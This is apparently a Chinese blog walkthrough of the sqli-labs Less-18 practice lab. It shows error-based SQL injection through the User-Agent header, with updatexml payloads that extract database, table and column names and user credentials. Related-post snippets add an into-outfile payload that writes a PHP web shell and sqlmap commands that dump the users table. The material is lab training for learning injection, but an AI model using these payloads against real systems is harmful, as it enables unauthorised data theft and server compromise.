sqli-labs Less-18

最新推荐文章于 2024-10-30 06:00:00 发布
原创 最新推荐文章于 2024-10-30 06:00:00 发布 · 943 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在sqli-labs的Less-18挑战中,如何利用POST请求的User-Agent字段进行Header注入。通过观察错误回显,发现了注入点,并逐步揭示了数据库名、表名、字段名以及字段值,展示了利用updatexml和extractvalue函数进行SQL注入的方法。

LESS-18 POST - Header Injection -Uagent field - Error based

0x01.
随便测试几个查看有无回显

错误回显和正确回显都是显示IP地址

错误回显:
在这里插入图片描述
正确回显:
在这里插入图片描述
在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分析。
在这里插入图片描述
用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地方注入不行,往下看。

在这里插入图片描述

发现insert语句,将user-agent以及IP数据插入数据库,可以利用进行注入。 (注意要输入正确的用户名和密码才能绕过用户名密码判断,进入处理user-agent部分)

利用updatexml进行注入

0x02.爆数据库名

'and updatexml(1,concat(0x7e,(database())),0x7e),1)-- #
(注意这里并不是URL而是HTTP头,所以+并不会被转义为(空格),于是末尾的注释符号要变为#)在这里插入图片描述
0x03.爆表名

'and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’)),0x7e),1)-- #
在这里插入图片描述
0x04.爆字段名

'and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0x7e),1)-- #
在这里插入图片描述
0x05.爆字段值

'and updatexml(1,concat(0x7e,(select * from(select concat_ws(0x7e,id,username,password)from users limit 0,1)a)),0),",")-- #
在这里插入图片描述改变limit的值获得其他用户名和密码
在这里插入图片描述
也可以用extractvalue()注入,还可以使用延时注入,子查询注入,但是不能用布尔盲注,因为无论错误还是正确都只会返回同样的页面。

Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1977
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-lab-less18
Sa1nZen的博客
08-05 253
sqli-lab-less18
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 882
一丢丢Sqli-labs小练习
SQLi LABS Less-18 报错注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第十八关请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
sqli-labs(less-18)
m0_64849639的博客
08-02 1088
less-18关于uagent注入
精选资源
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
精选资源
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使有直接...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
精选资源
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs (less-18)
kukudeshuo的博客
03-11 1326
sqli-labs (less-18) 进入18关,输入用户名和密码以后,我们发现屏幕上回显了我们的IP地址和我们的User Agent 用hackbar抓取POST包,在用户名和密码的位置判断注入点,这里我试了很久,发现用户名和密码的位置都是有注入点的,那是不是代表这关不存在SQL注入漏洞呢,我们注意到一个特点,页面回显了我们的User Agent,所以我们猜想可能注入点在User Agent这里 想抓取到User Agent,可以利用火狐插件或者使用burpsuite抓包,这里演示利用burpsui
sqli-labs less18
qq_45106794的博客
10-24 477
sqli-labs less 18 reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1) 先用这句话简单的判断后台insert 语句 insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′insert="INSERT INTO security.uage...
sqli-labs/Less-18
m0_71299382的博客
11-18 241
sqli-labs/第十八关
sqli-labsLess18~Less22
weixin_33976072的博客
08-16 215
Less18: User-Agent注入,有错误回显 感叹一句,越来越难了。现在只能先看代码再分析怎么注入了..... 通过代码,发现username和password均做了校验。但是会有一个插入user-agent的sql语句。故要通过user-agent注入。 用户名密码就假设已知为admin/admin了。 还是用updatexml函数,用Burp Suite更改user-agent字段为:...
sqli- labs - Less 18
m0_62102000的博客
08-11 297
sqli- labs - Less 18
【网络安全】sqli-labs Less-18 解题详析
等风来
07-29 4038
这个语句是从 security.users 表中的 username 列中获取用户名,获取到的并不是全部的用户名,而是从第一个字符开始的长度为 32 的子字符串。这里先介绍一下mid()函数,mid()函数是一种字符串函数,用于提取给定字符串的子字符串。该题为基于GET及报错的User-Agent注入,故需在参数后构造POC。函数将从第 7 个字符开始提取长度为 5 的子字符串,结果为。,如果想要提取其中的子字符串。例如,假设有一个字符串。由回显可知,注入类型为。该题采用抓包进行处理。
sqli-labs ————less -18
Fly_鹏程万里
05-12 3946
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Sqli-labsLess-18Less-19
→_→
04-12 4377
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
SQLI LABS | Less-18 POST-Header Injection-Uagent field-Error based
Blue17 の 小窝
10-30 844
hackbar插件。针对第一个问题,我们知道 UserAgent 里传递的一般是客户端的浏览器型号,比如使用的是手机浏览器还是 PC 浏览器访问的服务端,以及浏览器的版本信息这些内容。那么第一个问题的答案就很明显了,我首先得成功登录,然后服务端才会收集我 UserAgent 的信息,毕竟,如果任意一个人访问了服务端,服务端都会收集这些信息的话,耗费的资源就太大了。Payload 02 爆出来的结果就比较多了,看样子,它做的很像是。首先,我们需要拿到一个可以使用的用户名和密码,这里笔者使用的是。
sqli-labs-less-18、19、20、21、22
giun的博客
02-13 1505
先学习下http头部常见的一些关键字 Accept: 浏览器能够处理的内容类型 Accept-Charset: 浏览器能够显示的字符集 Accept-Encoding:浏览器能够处理的压缩编码。 Accept-Language: 浏览器当前设置的语言。 Connection:浏览器与服务器之间连接的类型 Cookie:当前页面设置的任何Cookie Host:发出请求的页面所在的域。 Refere...
sqli-labs less-18关sqlmap
最新发布
03-22
### 使用 SQLMap 解决 Sqli-labs Less-18 的 SQL 注入问题 SQLMap 是一款强大的自动化 SQL 注入工具,能够帮助渗透测试人员快速检测和利用 SQL 注入漏洞。对于 Sqli-labs Less-18 这一关卡,可以通过以下方法来解决问题。 #### 工具准备 确保已经安装了最新版本的 SQLMap 并配置好环境变量以便可以直接调用 `sqlmap` 命令[^2]。 #### URL 测试 在开始之前,可以尝试向目标 URL 添加单引号 `'` 来触发错误响应,验证是否存在可利用的 SQL 注入点。例如访问如下链接: ``` http://<target-ip>/sqli-labs/Less-18/?id=1' ``` 如果页面返回异常或者数据库报错,则说明可能存在注入漏洞[^3]。 #### 构建基本命令 构建基础的 SQLMap 执行命令用于扫描指定参数中的潜在漏洞。以下是针对 Less-18 的具体命令结构: ```bash sqlmap.py -u "http://<target-ip>/sqli-labs/Less-18/?id=1" --batch --dbms MySQL --technique=E,B,T,U,S --level=5 --risk=3 ``` 解释各选项含义如下: - `-u`: 指定目标 URL。 - `--batch`: 自动化模式下无需人工干预即可完成操作。 - `--dbms`: 明确指出使用的数据库管理系统类型为 MySQL。 - `--technique`: 定义采用的技术组合 (Error-based, Boolean-based blind, Time-based blind, Union query based, Stacked queries)[^1]。 - `--level/--risk`: 提高探测级别与风险等级以覆盖更多可能存在的复杂情况。 #### 获取敏感信息 一旦确认存在注入可能性之后,就可以进一步提取有用的数据比如当前用户、数据库名称列表等等。下面列举几个常用子命令及其作用: - **获取所有可用数据库** ```bash sqlmap.py -u "http://<target-ip>/sqli-labs/Less-18/?id=1" --dbs --batch ``` - **枚举特定数据库内的表名** ```bash sqlmap.py -u "http://<target-ip>/sqli-labs/Less-18/?id=1" -D security --tables --batch ``` - **读取某张表格里的列字段定义** ```bash sqlmap.py -u "http://<target-ip>/sqli-labs/Less-18/?id=1" -D security -T users --columns --batch ``` - **导出实际记录值** ```bash sqlmap.py -u "http://<target-ip>/sqli-labs/Less-18/?id=1" -D security -T users -C username,password --dump --batch ``` 以上每一步都依赖于前序步骤成功执行的结果才能继续推进下去。 ### 注意事项 在整个过程中需注意保护合法资产不受损害;仅限授权范围内开展此类活动;严格遵循法律法规要求进行学习研究性质的操作实践[^4]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值